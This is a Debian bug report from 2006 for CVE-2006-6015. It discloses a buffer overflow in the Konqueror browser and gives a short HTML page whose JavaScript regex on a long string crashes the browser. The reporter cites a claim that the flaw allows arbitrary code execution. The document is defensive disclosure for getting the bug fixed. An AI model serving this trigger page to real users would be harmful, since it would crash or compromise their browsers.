Bug#400121: CVE-2006-6015: Buffer overflow in konqueror

To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Bug#400121: CVE-2006-6015: Buffer overflow in konqueror
From: Stefan Fritsch <sf@sfritsch.de>
Date: Thu, 23 Nov 2006 23:24:18 +0100
Message-id: <[🔎] 20061123222418.15275.77406.reportbug@k.lan>
Reply-to: Stefan Fritsch <sf@sfritsch.de>, 400121@bugs.debian.org

Package: konqueror
Version: 4:3.5.5a.dfsg.1-2
Severity: grave
Tags: security
Justification: user security hole


Konqueror crashes when opening the following page:

<html>
<head>
<script>
var reg = /(.)*/;
var z = 'Z';
while (z.length <= 8192) z+=z;
var boum = reg.exec(z);
</script>
</head>
</html>

The original poster claimed this could be used to execute arbitrary
code:
http://www.securityfocus.com/archive/1/archive/1/451542/100/0/threaded

Please mention the CVE id in the changelog

-- System Information:
Debian Release: 4.0
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Locale: LANG=de_DE@euro, LC_CTYPE=de_DE@euro (charmap=ISO-8859-15)

Versions of packages konqueror depends on:
ii  kcontrol               4:3.5.5a.dfsg.1-2 control center for KDE
ii  kdebase-kio-plugins    4:3.5.5a.dfsg.1-2 core I/O slaves for KDE
ii  kdelibs4c2a            4:3.5.5a.dfsg.1-5 core libraries and binaries for al
ii  kdesktop               4:3.5.5a.dfsg.1-2 miscellaneous binaries and files f
ii  kfind                  4:3.5.5a.dfsg.1-2 file-find utility for KDE
ii  libacl1                2.2.41-1          Access control list shared library
ii  libart-2.0-2           2.3.17-1          Library of functions for 2D graphi
ii  libattr1               2.4.32-1          Extended attribute shared library
ii  libaudio2              1.8-2             The Network Audio System (NAS). (s
ii  libc6                  2.3.6.ds1-8       GNU C Library: Shared libraries
ii  libfam0                2.7.0-11          Client library to control the FAM 
ii  libfontconfig1         2.4.1-2           generic font configuration library
ii  libfreetype6           2.2.1-5           FreeType 2 font engine, shared lib
ii  libgcc1                1:4.1.1-20        GCC support library
ii  libice6                1:1.0.1-2         X11 Inter-Client Exchange library
ii  libidn11               0.6.5-1           GNU libidn library, implementation
ii  libjpeg62              6b-13             The Independent JPEG Group's JPEG 
ii  libkonq4               4:3.5.5a.dfsg.1-2 core libraries for Konqueror
ii  libpng12-0             1.2.13-4          PNG library - runtime
ii  libqt3-mt              3:3.3.7-1         Qt GUI Library (Threaded runtime v
ii  libsm6                 1:1.0.1-3         X11 Session Management library
ii  libstdc++6             4.1.1-20          The GNU Standard C++ Library v3
ii  libx11-6               2:1.0.3-4         X11 client-side library
ii  libxcursor1            1.1.7-4           X cursor management library
ii  libxext6               1:1.0.1-2         X11 miscellaneous extension librar
ii  libxft2                2.1.8.2-8         FreeType-based font drawing librar
ii  libxi6                 1:1.0.1-3         X11 Input extension library
ii  libxinerama1           1:1.0.1-4.1       X11 Xinerama extension library
ii  libxrandr2             2:1.1.0.2-4       X11 RandR extension library
ii  libxrender1            1:0.9.1-3         X Rendering Extension client libra
ii  libxt6                 1:1.0.2-2         X11 toolkit intrinsics library
ii  zlib1g                 1:1.2.3-13        compression library - runtime

konqueror recommends no packages.

-- no debconf information

Reply to:

Follow-Ups:
- Bug#400121: CVE-2006-6015: Buffer overflow in konqueror
  - From: Olivier Trichet <nive@nivalis.org>

Prev by Date: Bug#370402: upstream bug closed
Next by Date: Bug#370402: marked as done (konqueror: Crash loading www.microsoft.com)
Previous by thread: Bug#370402: upstream bug closed
Next by thread: Bug#400121: CVE-2006-6015: Buffer overflow in konqueror
Index(es):
- Date
- Thread